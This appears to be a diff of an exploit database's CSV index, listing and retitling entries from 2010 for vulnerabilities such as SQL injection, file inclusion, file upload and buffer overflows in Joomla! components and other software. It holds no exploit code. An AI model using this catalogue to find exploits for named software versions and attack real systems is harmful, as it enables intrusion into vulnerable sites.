12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory com_lovefactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment com_jacomment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12233,platforms/php/webapps/12233.txt,"Joomla! Component 'com_mtfireeagle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12234,platforms/php/webapps/12234.txt,"Joomla! Component 'com_mediamall' - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12238,platforms/php/webapps/12238.txt,"Joomla! Component 'com_blogfactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12239,platforms/php/webapps/12239.txt,"Joomla! Component 'com_beeheard' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0
|
||||
15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
|
||||
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
|
||||
|
@ -11191,7 +11191,7 @@ id,file,description,date,author,platform,type,port
|
|||
12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote,0
|
||||
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
|
||||
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
|
||||
12246,platforms/php/webapps/12246.txt,"Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0
|
||||
12246,platforms/php/webapps/12246.txt,"Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
|
||||
12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0
|
||||
12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
|
||||
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
|
||||
|
@ -11201,7 +11201,7 @@ id,file,description,date,author,platform,type,port
|
|||
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
|
||||
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0
|
||||
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
|
||||
12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
|
||||
|
@ -11213,8 +11213,8 @@ id,file,description,date,author,platform,type,port
|
|||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component 'com_joltcard' - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
|
||||
12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
|
||||
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
|
||||
|
@ -11223,16 +11223,16 @@ id,file,description,date,author,platform,type,port
|
|||
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0
|
||||
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0
|
||||
12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0
|
||||
12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12283,platforms/php/webapps/12283.txt,"Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12284,platforms/php/webapps/12284.txt,"Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko com_matamko - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12287,platforms/php/webapps/12287.txt,"Joomla! Component Multiple Root com_multiroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12288,platforms/php/webapps/12288.txt,"Joomla! Component Multiple Map com_multimap - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12289,platforms/php/webapps/12289.txt,"Joomla! Component Contact Us Draw Root Map com_drawroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12290,platforms/php/webapps/12290.txt,"Joomla! Component Contact Us Google Map com_google - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12282,platforms/php/webapps/12282.txt,"Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12286,platforms/php/webapps/12286.txt,"Joomla! Component 'com_matamko' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12287,platforms/php/webapps/12287.txt,"Joomla! Component 'com_multiroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12288,platforms/php/webapps/12288.txt,"Joomla! Component 'com_multimap' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12289,platforms/php/webapps/12289.txt,"Joomla! Component 'com_drawroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12290,platforms/php/webapps/12290.txt,"Joomla! Component 'com_google' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12291,platforms/php/webapps/12291.txt,"Joomla! Component 'com_if_surfalert' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0
|
||||
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
|
||||
12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
|
||||
|
@ -11240,13 +11240,13 @@ id,file,description,date,author,platform,type,port
|
|||
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,"cr4wl3r ",php,webapps,0
|
||||
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0
|
||||
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
|
||||
12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
|
||||
12299,platforms/php/webapps/12299.txt,"Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
|
||||
12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0
|
||||
12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
|
||||
12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0
|
||||
12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0
|
||||
12305,platforms/php/webapps/12305.txt,"Joomla! Component com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
|
||||
12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
|
||||
12305,platforms/php/webapps/12305.txt,"Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
|
||||
12306,platforms/php/webapps/12306.txt,"Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
|
||||
12308,platforms/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0
|
||||
12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,windows,remote,0
|
||||
12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0
|
||||
|
@ -11254,15 +11254,15 @@ id,file,description,date,author,platform,type,port
|
|||
12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,"cr4wl3r ",php,webapps,0
|
||||
12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
|
||||
12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0
|
||||
12316,platforms/php/webapps/12316.txt,"Joomla! Component wmi (com_wmi) - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12317,platforms/php/webapps/12317.txt,"Joomla! Component OrgChart com_orgchart - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12318,platforms/php/webapps/12318.txt,"Joomla! Component Mms Blog com_mmsblog - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12318,platforms/php/webapps/12318.txt,"Joomla! Component 'com_mmsblog' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0
|
||||
12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0
|
||||
12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0
|
||||
12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
|
||||
12325,platforms/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0
|
||||
12325,platforms/php/webapps/12325.txt,"Joomla! Component 'com_portfolio' - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0
|
||||
12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
|
||||
12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0
|
||||
12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0
|
||||
|
@ -11274,7 +11274,7 @@ id,file,description,date,author,platform,type,port
|
|||
12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
|
||||
12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0
|
||||
12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0
|
||||
12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0
|
||||
|
@ -11320,7 +11320,7 @@ id,file,description,date,author,platform,type,port
|
|||
12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0
|
||||
12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0
|
||||
12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component com_joomradio - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0
|
||||
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0
|
||||
12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0
|
||||
|
@ -11343,13 +11343,13 @@ id,file,description,date,author,platform,type,port
|
|||
12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0
|
||||
12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0
|
||||
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
|
||||
12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite com_smartsite - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12429,platforms/php/webapps/12429.pl,"Joomla! Extension ABC com_abc - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12430,platforms/php/webapps/12430.txt,"Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12429,platforms/php/webapps/12429.pl,"Joomla! Component 'com_abc' - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component JE Property Finder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
|
||||
|
@ -11357,7 +11357,7 @@ id,file,description,date,author,platform,type,port
|
|||
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12440,platforms/php/webapps/12440.txt,"Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0
|
||||
12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0
|
||||
12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12443,platforms/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps,0
|
||||
|
@ -11382,20 +11382,20 @@ id,file,description,date,author,platform,type,port
|
|||
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
|
||||
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
|
||||
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
|
||||
12465,platforms/php/webapps/12465.txt,"Joomla! Component com_newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0
|
||||
12465,platforms/php/webapps/12465.txt,"Joomla! Component 'com_newsfeeds' - SQL Injection",2010-04-30,Archimonde,php,webapps,0
|
||||
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0
|
||||
12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0
|
||||
12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0
|
||||
12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit",2010-04-30,Lincoln,windows,local,0
|
||||
12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps,0
|
||||
12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0
|
||||
12473,platforms/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities",2010-05-01,Valentin,php,webapps,0
|
||||
12474,platforms/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12473,platforms/php/webapps/12473.txt,"Joomla! Component 'Table JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12474,platforms/php/webapps/12474.txt,"Joomla! Component 'Card View JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0
|
||||
12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0
|
||||
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
|
||||
12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0
|
||||
12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
|
||||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
|
@ -11447,7 +11447,7 @@ id,file,description,date,author,platform,type,port
|
|||
12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0
|
||||
12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL Redirection",2010-05-08,ITSecTeam,php,webapps,0
|
||||
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
|
||||
12539,platforms/php/webapps/12539.txt,"Joomla! Component com_articleman - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0
|
||||
12539,platforms/php/webapps/12539.txt,"Joomla! Component 'com_articleman' - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0
|
||||
12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0
|
||||
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0
|
||||
12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0
|
||||
|
@ -11479,12 +11479,12 @@ id,file,description,date,author,platform,type,port
|
|||
12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0
|
||||
12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution",2010-05-11,"Krystian Kloskowski",windows,remote,0
|
||||
12574,platforms/php/webapps/12574.txt,"Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0
|
||||
12574,platforms/php/webapps/12574.txt,"Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0
|
||||
12575,platforms/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
12576,platforms/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
